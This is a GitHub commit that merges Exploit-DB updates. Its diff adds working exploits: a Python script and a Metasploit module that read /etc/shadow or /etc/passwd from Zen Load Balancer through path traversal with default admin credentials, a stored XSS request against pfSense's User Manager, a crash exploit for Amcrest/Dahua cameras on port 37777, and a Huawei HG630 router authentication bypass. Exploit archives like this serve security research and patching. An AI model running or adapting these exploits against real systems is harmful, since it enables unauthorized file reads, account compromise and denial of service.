Merge branch 'upstream-master' into misc

* upstream-master: DB: 2020-04-25 DB: 2020-04-24 DB: 2020-04-23 DB: 2020-04-22 DB: 2020-04-21 DB: 2020-04-18 DB: 2020-04-17 DB: 2020-04-16 DB: 2020-04-15 DB: 2020-04-14 Fix bash script DB: 2020-04-11 Remove debug command Fix a few grammar mistakes DB: 2020-04-09 DB: 2020-04-08 DB: 2020-04-07 Fix apt install of exploitdb-{bin-sploits/papers} # Conflicts: # searchsploit
Isamalrikabi · Apr 27, 2020 · 23e4067 · 23e4067
2 parents 4dd344c + 7b87f30
commit 23e4067
Show file tree

Hide file tree

Showing 96 changed files with 13,520 additions and 34 deletions.
diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py
@@ -0,0 +1,31 @@
+# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
+# Date: 2020-04-10
+# Exploit Author: Basim Alabdullah
+# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
+# Version: 3.10.1
+# Tested on: Debian8u2
+#
+# Technical Details:
+# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
+# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
+# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
+#
+# Impact:
+# --------
+# Successful exploitation could allow an attacker to obtain sensitive
+# information.
+
+import requests
+import sys
+
+if len(sys.argv) <2:
+    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
+    sys.exit(-1)
+else:
+    files=sys.argv[2]
+    url=sys.argv[1]    
+    with requests.session() as s:
+        urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
+        response = s.get(urlz, auth=('admin', 'admin'), verify=False)
+        txt=response.text
+        print(response.text)
diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Zen Load Balancer Directory Traversal",
+      'Description'    => %q{
+          This module exploits a authenticated directory traversal
+vulnerability in Zen Load
+          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
+properly handling 'filelog='
+          parameter which allows a malicious actor to load arbitrary file path.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Basim Alabdullah', # Vulnerability discovery
+          'Dhiraj Mishra'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '48308']
+        ],
+      'DisclosureDate' => "Apr 10 2020"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(444),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
+        OptString.new('FILEPATH', [false, 'The name of the file to
+download', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, "The base URI path of the
+ZenConsole install", '/']),
+        OptString.new('HttpUsername', [true, 'The username to use for
+the HTTP server', 'admin']),
+        OptString.new('HttpPassword', [false, 'The password to use for
+the HTTP server', 'admin'])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "../" * datastore['DEPTH']
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.cgi'),
+      'vars_get'=>
+      {
+        'id'      => '2-3',
+        'filelog' => "#{traversal}#{filename}",
+        'nlines'  => '100',
+        'action'  => 'See logs'
+      },
+      'authorization' =>
+basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
+      }, 25)
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    print_good("#{peer} - Downloaded #{res.body.length} bytes")
+    path = store_loot(
+      'zenload.http',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end
diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt
@@ -0,0 +1,39 @@
+# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
+# Date: 2020-04-02
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.pfsense.org
+# Version: PfSense 2.4.4-P3
+# Tested on: FreeBSD 11.2-RELEASE-p10
+# CVE : CVE-2020-11457
+
+# Vulnerability Details
+# Description :  A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
+# Vulnerable Parameter : descr 
+
+
+# POC
+# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.  
+# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is 
+# the id of the user containing the payload.
+
+
+POST /system_usermanager.php?act=new HTTP/1.1
+Host: TARGET
+Connection: close
+Content-Length: 410
+Cache-Control: max-age=0
+Origin: https://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Sec-Fetch-Dest: document
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Referer: https://TARGET/system_usermanager.php?act=new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
+
+__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py
@@ -0,0 +1,153 @@
+# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
+# Date: 2020-04-07
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://amcrest.com/
+# Software Link: https://amcrest.com/firmwaredownloads
+# Version: Many different versions due to number of Dahua/Amcrest/etc
+# devices affected
+# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
+# 4.000.00AC000.0
+# CVE : CVE-2020-5735
+# Advisory: https://www.tenable.com/security/research/tra-2020-20
+# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
+
+import argparse
+import hashlib
+import socket
+import struct
+import sys
+import md5
+import re
+
+## DDNS test functionality. Stack overflow via memcpy
+
+def recv_response(sock):
+    # minimum size is 32 bytes
+    header = sock.recv(32)
+
+    # check we received enough data
+    if len(header) != 32:
+        print 'Invalid response. Too short'
+        return (False, '', '')
+
+    # extract the payload length field
+    length_field = header[4:8]
+    payload_length = struct.unpack_from('I', length_field)
+    payload_length = payload_length[0]
+
+    # uhm... lets be restrictive of accepted lengths
+    if payload_length < 0 or payload_length > 4096:
+        print 'Invalid response. Bad payload length'
+        return (False, header, '')
+
+    if (payload_length == 0):
+        return (True, header, '')
+
+    payload = sock.recv(payload_length)
+    if len(payload) != payload_length:
+        print 'Invalid response. Bad received length'
+        return (False, header, payload)
+
+    return (True, header, payload)
+
+def sofia_hash(msg):
+    h = ""
+    m = hashlib.md5()
+    m.update(msg)
+    msg_md5 = m.digest()
+    for i in range(8):
+        n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
+        if n > 9:
+            if n > 35:
+                n += 61
+            else:
+                n += 55
+        else:
+            n += 0x30
+        h += chr(n)
+    return h
+
+top_parser = argparse.ArgumentParser(description='lol')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip",
+required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port",
+type=int, help="The port to connect to", default="37777")
+top_parser.add_argument('-u', '--username', action="store",
+dest="username", help="The user to login as", default="admin")
+top_parser.add_argument('--pass', action="store", dest="password",
+required=True, help="The password to use")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+# send the old style login request. We'll use blank hashes. This should
+# trigger a challenge from new versions of the camera
+old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
+             "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
+             "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
+             "\x05\x02\x00\x01\x00\x00\xa1\xaa")
+sock.sendall(old_login)
+(success, header, challenge) = recv_response(sock)
+if success == False or not challenge:
+    print 'Failed to receive the challenge'
+    print challenge
+    sys.exit(0)
+
+# extract the realm and random seed
+seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
+challenge)
+if seeds == None:
+    print 'Failed to extract realm and random seed.'
+    print challenge
+    sys.exit(0)
+
+realm = seeds.group(1)
+random = seeds.group(2)
+
+# compute the response
+realm_hash = md5.new(args.username + ":" + realm + ":" +
+args.password).hexdigest().upper()
+random_hash = md5.new(args.username + ":" + random + ":" +
+realm_hash).hexdigest().upper()
+sofia_result = sofia_hash(args.password)
+final_hash = md5.new(args.username + ":" + random + ":" +
+sofia_result).hexdigest().upper()
+
+challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
+                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
+                  "\x00\x00\x00\x00\x00\x00\x00\x00" +
+                  "\x05\x02\x00\x08\x00\x00\xa1\xaa" +
+                  args.username + "&&" + random_hash + final_hash)
+sock.sendall(challenge_resp)
+
+(success, header, payload) = recv_response(sock)
+if success == False or not header:
+    print 'Failed to receive the session id'
+    sys.exit(0)
+
+session_id_bin = header[16:20]
+session_id_int = struct.unpack_from('I', session_id_bin)
+if session_id_int[0] == 0:
+    print "Log in failed."
+    sys.exit(0)
+
+session_id = session_id_int[0]
+print "[+] Session ID: " + str(session_id)
+
+# firmware version
+command = "Protocol: " + ("a" * 0x300) + "\r\n"
+command_length = struct.pack("I", len(command))
+firmware = ("\x62\x00\x00\x00" + command_length +
+            "\x04\x00\x00\x00\x00\x00\x00\x00" +
+            "\x00\x00\x00\x00\x00\x00\x00\x00" +
+            "\x00\x00\x00\x00\x00\x00\x00\x00" +
+            command)
+sock.sendall(firmware)
+(success, header, firmware_string) = recv_response(sock)
+if success == False and not header:
+    print "[!] Probably crashed the server."
+else:
+    print "[+] Attack failed."
diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt
@@ -0,0 +1,51 @@
+# Title: Huawei HG630 2 Router - Authentication Bypass
+# Date: 2020-04-13
+# Author: Eslam Medhat
+# Vendor Homepage: www.huawei.com
+# Version: HG630 V2
+# HardwareVersion: VER.B
+# CVE: N/A
+
+#POC:
+
+The default password of this router is the last 8 characters of the
+device's serial number which exist in the back of the device.
+
+An attacker can leak the serial number via the web app API like the
+following:
+
+************************Request************************
+GET /api/system/deviceinfo HTTP/1.1
+Host: 192.168.1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
+Gecko/20100101 Firefox/65.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://192.168.1.1/
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie:
+SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
+
+
+************************Response************************
+HTTP/1.1 200 OK
+Cache-Control: no-cache, no-store, max-age=0, must-revalidate
+X-Download-Options: noopen
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+Date: Fri, 01 Jan 2010 09:14:47 GMT
+Connection: Keep-Alive
+Content-Language: en
+Content-Type: application/javascript
+Content-Length: 141
+
+while(1); /*{"DeviceName":"HG630
+V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
+
+
+You can use that serial number to login to the router.
+
+#Reference:
+https://www.youtube.com/watch?v=vOrIL7L_cVc